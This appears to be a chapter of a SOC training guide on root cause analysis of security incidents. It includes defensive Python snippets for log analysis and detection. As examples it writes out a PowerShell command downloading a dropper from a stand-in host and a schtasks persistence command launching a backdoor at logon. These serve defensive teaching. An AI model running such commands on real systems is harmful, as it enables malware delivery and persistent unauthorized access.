Root Cause Analysis (RCA) is the process of identifying how an incident started, what enabled it, and what allowed the attacker or malware to succeed.
RCA determines the initial point of failure, not just the symptoms.
A SOC analyst must find the exact weakness—misconfiguration, user action, vulnerability, or missing detection—that allowed the incident to occur.
This chapter covers RCA as it is practiced in a SOC, focusing on log evidence, investigative workflow, attacker timelines, and SOC case studies.
What Root Cause Analysis Really Means
RCA answers the most important questions in incident response:
- How did the attacker get in?
- What allowed the attack to succeed?
- What vulnerability or mistake was exploited?
- Could this have been prevented?
- What detection or control failed?
- Is the root cause fixed so it won't happen again?
RCA goes beyond identifying malware or suspicious behavior.
It digs into the origin, not the symptoms.
When RCA Happens in the Incident Lifecycle
RCA occurs after containment and eradication, during the deeper investigation led by L2/L3 analysts.
It relies on:
- Host logs
- Network logs
- EDR telemetry
- Forensics
- User activity history
- Configuration audits
Together, these sources let the analyst reconstruct how the incident began.
Core Components of Root Cause Analysis
1. Trigger Event Identification
Identify the exact moment where malicious activity started.
Example:
User clicked phishing URL at 10:32 UTC → dropper.ps1 downloaded
This event starts the entire attack timeline.
2. Initial Access Vector
Determine how the attacker first entered.
Common vectors:
- Phishing
- Vulnerable public-facing apps
- Weak passwords
- Exposed RDP
- Stolen credentials
- Misconfigured cloud resources
Example:
Brute force → successful SSH login
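A brute-force entry like the one above usually shows up as a run of failed logins followed by a success from the same source. The following is a minimal sketch, assuming OpenSSH-style "Failed password" and "Accepted password" messages; the sample lines, the IP addresses, and the threshold of 5 are illustrative assumptions, not values from a real incident.

```python
import re
from collections import defaultdict

# Matches OpenSSH-style auth messages; "invalid user" may precede the username.
AUTH_RE = re.compile(
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+)"
)

def find_bruteforce_successes(lines, threshold=5):
    """Return (ip, user, prior_failures) for each accepted login that
    follows at least `threshold` failed attempts from the same source IP."""
    failures = defaultdict(int)
    hits = []
    for line in lines:
        m = AUTH_RE.search(line)
        if not m:
            continue
        ip = m.group("ip")
        if m.group("result") == "Failed":
            failures[ip] += 1
        elif failures[ip] >= threshold:
            hits.append((ip, m.group("user"), failures[ip]))
    return hits

# Hypothetical log lines for demonstration only.
sample_log = (
    ["sshd[811]: Failed password for root from 203.0.113.5 port 40022 ssh2"] * 6
    + [
        "sshd[811]: Accepted password for root from 203.0.113.5 port 40030 ssh2",
        "sshd[812]: Accepted password for alice from 198.51.100.7 port 51514 ssh2",
    ]
)

print(find_bruteforce_successes(sample_log))
```

The second accepted login is not reported because no failures preceded it from that address. A real investigation would also bound the failures to a time window, which this sketch omits.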
3. Execution Path
Identify what code executed and how.
Examples:
- Encoded PowerShell
- MS Office macro execution
- Linux shell script in /tmp
- DLL side-loading
Example:
WINWORD.exe → powershell.exe → payload.exe
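When the chain includes encoded PowerShell, the analyst needs the decoded command to see what actually ran. PowerShell's -EncodedCommand argument is Base64 over UTF-16LE text, so a short sketch like the one below can recover it. The command string and the example.invalid URL are hypothetical and are encoded here only to demonstrate the round trip.

```python
import base64

def decode_powershell_encoded_command(encoded: str) -> str:
    """Decode the argument of powershell.exe -EncodedCommand
    (Base64 applied to UTF-16LE text)."""
    return base64.b64decode(encoded).decode("utf-16-le")

# Hypothetical command, used only to produce a sample encoded value.
original = (
    "Invoke-WebRequest -Uri http://example.invalid/dropper.ps1 "
    "-OutFile dropper.ps1"
)
encoded = base64.b64encode(original.encode("utf-16-le")).decode("ascii")

print(decode_powershell_encoded_command(encoded))
```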
4. Privilege Escalation Cause
Identify how the attacker obtained elevated rights.
Examples:
- Sudo misconfiguration
- Token theft
- Kerberoasting
- Exploits
Example:
sudoers file allowed user to execute bash without password
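A sudoers weakness of this kind can be spotted by scanning for NOPASSWD rules that grant a shell or ALL. The sketch below is a simplified check, assuming one rule per line and no aliases or include directives; the shell list and the sample sudoers content are hypothetical.

```python
# Commands that hand over a full root session when allowed without a
# password (illustrative list, not exhaustive).
RISKY_COMMANDS = {"ALL", "/bin/bash", "/usr/bin/bash", "/bin/sh", "/bin/zsh"}

def risky_sudoers_entries(text):
    """Return (user, command) pairs where NOPASSWD grants a shell or ALL."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "NOPASSWD:" not in line:
            continue
        user = line.split()[0]
        commands = line.split("NOPASSWD:", 1)[1]
        for cmd in (c.strip() for c in commands.split(",")):
            if cmd in RISKY_COMMANDS:
                findings.append((user, cmd))
    return findings

# Hypothetical sudoers content for demonstration only.
sample_sudoers = """
root    ALL=(ALL:ALL) ALL
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app
webuser ALL=(ALL) NOPASSWD: /bin/bash
"""

print(risky_sudoers_entries(sample_sudoers))
```

Only the webuser rule is reported: the deploy rule is limited to a single service command, and the root rule still requires a password.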
5. Persistence Mechanism
Determine how the attacker maintained access.
Examples:
- Registry Run keys
- Cron job
- Scheduled task
- Malicious service
Example:
schtasks /create /tn "Updater" /tr C:\Users\Public\bd.exe /sc onlogon
6. Detection Failure Analysis
Find out why detection didn’t fire earlier.
Reasons:
- Logging disabled
- Rule too broad or too narrow
- Telemetry missing
- Threat was unknown
- Tool malfunction
Example:
Sysmon not installed → no process creation logs
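A telemetry gap like this can be confirmed by checking which in-scope hosts produced no process creation events at all. The sketch below assumes events have already been exported as dictionaries with host, source, and event_id keys; those field names and the host names are hypothetical. Sysmon Event ID 1 and Windows Security Event ID 4688 both record process creation.

```python
# Event IDs that record process creation: Sysmon 1 and Windows Security 4688.
PROCESS_CREATION_IDS = {("Sysmon", 1), ("Security", 4688)}

def hosts_without_process_logging(expected_hosts, events):
    """Return hosts that produced no process creation events."""
    covered = {
        e["host"]
        for e in events
        if (e["source"], e["event_id"]) in PROCESS_CREATION_IDS
    }
    return sorted(set(expected_hosts) - covered)

# Hypothetical inventory and event export.
expected_hosts = ["WS-014", "WS-015", "SRV-FILE01"]
events = [
    {"host": "WS-014", "source": "Sysmon", "event_id": 1},
    {"host": "SRV-FILE01", "source": "Security", "event_id": 4688},
    {"host": "WS-015", "source": "Security", "event_id": 4624},
]

print(hosts_without_process_logging(expected_hosts, events))
```

WS-015 is reported because its only event is a logon, so any process activity on that host during the incident would have gone unrecorded.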
7. Control Weakness Identification
Identify which security control failed.
Examples:
- Missing patches
- Weak firewall rules
- No MFA
- Unrestricted outbound connections
- Unmonitored DNS traffic
Example:
Public-facing Tomcat server unpatched for 8 months
8. Final Root Cause Statement
A one-sentence explanation summarizing the true cause.
Example:
Root Cause: A user ran a malicious macro from a phishing email attachment; the macro downloaded a payload because attachments were not filtered and PowerShell execution was not restricted.
Practical RCA Workflow (SOC-Level)
The following workflow is typical for L2/L3 analysts.
Step 1 — Validate Timeline Start
Identify earliest suspicious action:
10:32 – User clicked phishing link
10:33 – payload.ps1 downloaded
10:34 – C2 communication established
The first suspicious event becomes the starting point.
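Timeline validation amounts to merging events from several log sources, sorting them by time, and taking the earliest suspicious one. The sketch below assumes events are already normalized into dictionaries with a UTC timestamp and a suspicious flag; the date, the field names, and the source labels are hypothetical.

```python
from datetime import datetime

def build_timeline(events):
    """Sort events by timestamp and return (earliest_suspicious, ordered)."""
    ordered = sorted(events, key=lambda e: e["time"])
    suspicious = [e for e in ordered if e["suspicious"]]
    return (suspicious[0] if suspicious else None), ordered

def ts(value):
    """Parse an ISO 8601 timestamp with an explicit UTC offset."""
    return datetime.fromisoformat(value)

# Hypothetical events collected from different sources, deliberately unsorted.
events = [
    {"time": ts("2024-01-15T10:34:00+00:00"), "source": "firewall",
     "detail": "C2 communication established", "suspicious": True},
    {"time": ts("2024-01-15T10:32:00+00:00"), "source": "proxy",
     "detail": "User clicked phishing link", "suspicious": True},
    {"time": ts("2024-01-15T10:33:00+00:00"), "source": "edr",
     "detail": "payload.ps1 downloaded", "suspicious": True},
    {"time": ts("2024-01-15T10:05:00+00:00"), "source": "auth",
     "detail": "Normal interactive logon", "suspicious": False},
]

first, ordered = build_timeline(events)
print(first["time"].strftime("%H:%M"), first["detail"])
```

Keeping every timestamp in UTC before sorting matters in practice, because proxy, EDR, and firewall logs often use different local time zones.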
Step 2 — Identify Attack Vector
Using logs:
- Proxy logs → malicious URL
- Email logs → phishing email
- Firewall logs → inbound traffic
- Authentication logs → brute force success
Example:
Email attachment triggered macro → malicious script executed
Step 3 — Reconstruct Execution Chain
Using Sysmon and Linux logs:
WINWORD.exe → powershell.exe → curl → payload.exe
OR
/tmp/bd.sh executed → created miner binary
The execution chain shows how the malware ran.
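An execution chain can be rebuilt from process creation events by following parent links from the final payload back to the first process. The sketch below assumes each event carries pid, ppid, and image fields, which are hypothetical names for an exported record. It ignores PID reuse; Sysmon's ProcessGuid and ParentProcessGuid fields are a more reliable key in real data.

```python
def build_chain(events, leaf_pid):
    """Walk parent links from leaf_pid upward and return image names
    ordered from the earliest ancestor to the leaf."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    seen = set()
    pid = leaf_pid
    while pid in by_pid and pid not in seen:
        seen.add(pid)  # guards against loops in malformed data
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))

# Hypothetical process creation records.
events = [
    {"pid": 4100, "ppid": 900, "image": "WINWORD.exe"},
    {"pid": 5220, "ppid": 4100, "image": "powershell.exe"},
    {"pid": 6012, "ppid": 5220, "image": "payload.exe"},
    {"pid": 7000, "ppid": 900, "image": "chrome.exe"},
]

print(" → ".join(build_chain(events, leaf_pid=6012)))
```

The walk stops at WINWORD.exe because its parent (PID 900) is not in the exported set, which is also where an analyst would go looking for more logs.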
Step 4 — Determine Privilege Escalation
Check for:
- sudo
- exploitation
- credential dumping
- AD misconfigurations
Example:
Event ID 4672: special privileges assigned to a new logon by the compromised user
Step 5 — Identify Lateral Movement
Firewall + Windows auth logs:
Event ID 4624, LogonType 3 (network logon) from the infected host
Network logs:
SMB connection to file server
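To list where the attacker moved, an analyst can filter successful network logons that originate from the infected host. The sketch below assumes Event ID 4624 records exported as dictionaries; the field names, host names, and IP addresses are hypothetical.

```python
def lateral_logon_targets(events, infected_ip):
    """Return hosts that accepted a network logon (Event ID 4624,
    LogonType 3) from infected_ip, in first-seen order."""
    targets = []
    for e in events:
        is_network_logon = e["event_id"] == 4624 and e["logon_type"] == 3
        if is_network_logon and e["source_ip"] == infected_ip:
            if e["host"] not in targets:
                targets.append(e["host"])
    return targets

# Hypothetical exported logon events.
events = [
    {"host": "FILE01", "event_id": 4624, "logon_type": 3, "source_ip": "10.0.5.23"},
    {"host": "FILE01", "event_id": 4624, "logon_type": 3, "source_ip": "10.0.5.23"},
    {"host": "DC01", "event_id": 4624, "logon_type": 3, "source_ip": "10.0.5.40"},
    {"host": "WS-014", "event_id": 4624, "logon_type": 2, "source_ip": "10.0.5.23"},
]

print(lateral_logon_targets(events, infected_ip="10.0.5.23"))
```

Network logons are common in normal domain traffic, so the result is a list of hosts to examine rather than proof of compromise.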
Step 6 — Persistence Review
Check:
- Registry Run keys
- Cron jobs
- Services
- Scheduled tasks
Example:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run → updater.exe
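Once autorun entries have been exported, a quick triage is to flag any that launch from user-writable directories. The sketch below works on a plain dictionary of value name to command line; the directory list and the sample entries are hypothetical, and a match is only a lead for further review.

```python
# Directory fragments that ordinary users can write to (illustrative list).
USER_WRITABLE_FRAGMENTS = ("\\users\\public\\", "\\appdata\\local\\temp\\")

def suspicious_autoruns(run_entries):
    """Return the autorun entries whose command points into a
    user-writable directory."""
    flagged = {}
    for name, command in run_entries.items():
        lowered = command.lower()
        if any(fragment in lowered for fragment in USER_WRITABLE_FRAGMENTS):
            flagged[name] = command
    return flagged

# Hypothetical Run key values exported from a host.
run_entries = {
    "OneDrive": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background",
    "updater": r"C:\Users\Public\updater.exe",
}

print(suspicious_autoruns(run_entries))
```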
Step 7 — Identify Control Failures
Examples:
- No EDR on machine
- SIEM rule too weak
- Lack of network segmentation
- Unrestricted outbound traffic
- No MFA on admin accounts
Step 8 — Deliver Root Cause Statement
Final deliverable includes:
- Trigger event
- Attack vector
- Failed control
- Weakness exploited
- What allowed escalation
- How to prevent recurrence
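The six items of the deliverable can be captured in a small record so that no field is left out of the final report. The sketch below is one possible structure, not a standard format; the class name, field names, and sample values are assumptions for illustration.

```python
from dataclasses import dataclass, fields

@dataclass
class RootCauseSummary:
    trigger_event: str
    attack_vector: str
    failed_control: str
    weakness_exploited: str
    escalation_enabler: str
    prevention: str

    def missing_fields(self):
        """Return the names of fields that were left blank."""
        return [f.name for f in fields(self) if not getattr(self, f.name).strip()]

    def render(self):
        """Render one 'Label: value' line per field."""
        lines = []
        for f in fields(self):
            label = f.name.replace("_", " ").capitalize()
            lines.append(f"{label}: {getattr(self, f.name)}")
        return "\n".join(lines)

# Hypothetical values for a phishing incident.
summary = RootCauseSummary(
    trigger_event="User opened a malicious Word document",
    attack_vector="Phishing email attachment",
    failed_control="Email attachment filtering",
    weakness_exploited="Office macros allowed to launch PowerShell",
    escalation_enabler="",
    prevention="Block macros from the internet and restrict PowerShell",
)

print(summary.render())
print("Missing:", summary.missing_fields())
```

Leaving the escalation field blank in the sample shows how the check surfaces an incomplete analysis before the report is delivered.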
Real SOC RCA Examples
Example 1 — Malware Infection from Phishing
Findings:
- User opened malicious Word doc
- Macro executed PowerShell
- Downloaded payload
- C2 communication established
- No EDR installed
- PowerShell logging disabled
Root Cause:
Phishing email led to macro execution due to inadequate email filtering and insufficient PowerShell restrictions.
Example 2 — SSH Brute Force → Server Compromise
Findings:
- Public SSH exposed
- Password-based auth enabled
- Weak password
- Attacker brute-forced credentials
- Installed crypto miner
Root Cause:
Weak SSH password and lack of brute force protection allowed unauthorized access.
Example 3 — Lateral Movement in Windows Domain
Findings:
- User credentials stolen via LSASS dumping
- Credential Guard not enabled
- Attacker used valid credentials
- Moved through SMB and WinRM
Root Cause:
LSASS memory exposure due to lack of endpoint hardening enabled credential theft and lateral movement.
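Where Sysmon is deployed, LSASS access can be reviewed through Event ID 10 (ProcessAccess), which records a source and target image. The sketch below filters exported events for unexpected processes opening lsass.exe; the field names, the allowlist, and the sample records are hypothetical, and a production allowlist would need tuning per environment.

```python
# Processes assumed to open lsass.exe legitimately (hypothetical allowlist).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

def unexpected_lsass_access(events):
    """Return (host, source_image) for ProcessAccess events that target
    lsass.exe from a process outside the allowlist."""
    flagged = []
    for e in events:
        if e["event_id"] != 10:
            continue
        if not e["target_image"].lower().endswith("\\lsass.exe"):
            continue
        if e["source_image"].lower() in ALLOWED_SOURCES:
            continue
        flagged.append((e["host"], e["source_image"]))
    return flagged

LSASS = r"C:\Windows\System32\lsass.exe"

# Hypothetical exported Sysmon events.
events = [
    {"host": "WS-014", "event_id": 10,
     "source_image": r"C:\Windows\System32\csrss.exe", "target_image": LSASS},
    {"host": "WS-014", "event_id": 10,
     "source_image": r"C:\Users\Public\procdump.exe", "target_image": LSASS},
    {"host": "WS-014", "event_id": 1,
     "source_image": r"C:\Windows\explorer.exe", "target_image": LSASS},
]

print(unexpected_lsass_access(events))
```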
Example 4 — Cloud Misconfiguration
Findings:
- S3 bucket misconfigured as public
- Data exposed externally
- No IAM policy restrictions
- No monitoring
Root Cause:
Public S3 bucket misconfiguration caused unauthorized external access.
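One way a bucket becomes public is a bucket policy with an Allow statement for a wildcard principal. The sketch below inspects a policy document offline, without calling AWS. It is a simplified check that treats any statement with a Condition as not public and does not look at ACLs or Block Public Access settings; the bucket name and Sid values are hypothetical.

```python
import json

def is_wildcard_principal(principal):
    """True if the Principal element is "*" or {"AWS": "*"} (or a list with "*")."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False

def public_statements(policy_json):
    """Return the Sid of each unconditional Allow for a wildcard principal."""
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]
    flagged = []
    for s in statements:
        if (s.get("Effect") == "Allow"
                and is_wildcard_principal(s.get("Principal"))
                and "Condition" not in s):
            flagged.append(s.get("Sid", "<no Sid>"))
    return flagged

# Hypothetical bucket policy for demonstration only.
sample_policy = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "AppWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:role/app"},
         "Action": "s3:PutObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
})

print(public_statements(sample_policy))
```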
Analyst Workflow for RCA
- Collect all logs (endpoint + network + cloud)
- Identify earliest malicious event
- Determine entry point
- Reconstruct execution chain
- Identify privilege escalation
- Identify lateral movement
- Identify persistence mechanisms
- Determine detection failures
- Identify configuration or policy gaps
- Finalize root cause statement
A thorough RCA helps prevent repeat incidents.
Intel Dump
- RCA identifies the true origin of an attack, not just symptoms.
- It requires reconstructing the full timeline from the earliest malicious event.
- RCA includes initial access, execution, escalation, persistence, lateral movement, and detection failure analysis.
- Common root causes include phishing, weak passwords, unpatched systems, misconfigurations, missing logging, and lack of segmentation.
- RCA ends with a clear statement: what caused the incident and how to prevent it in the future.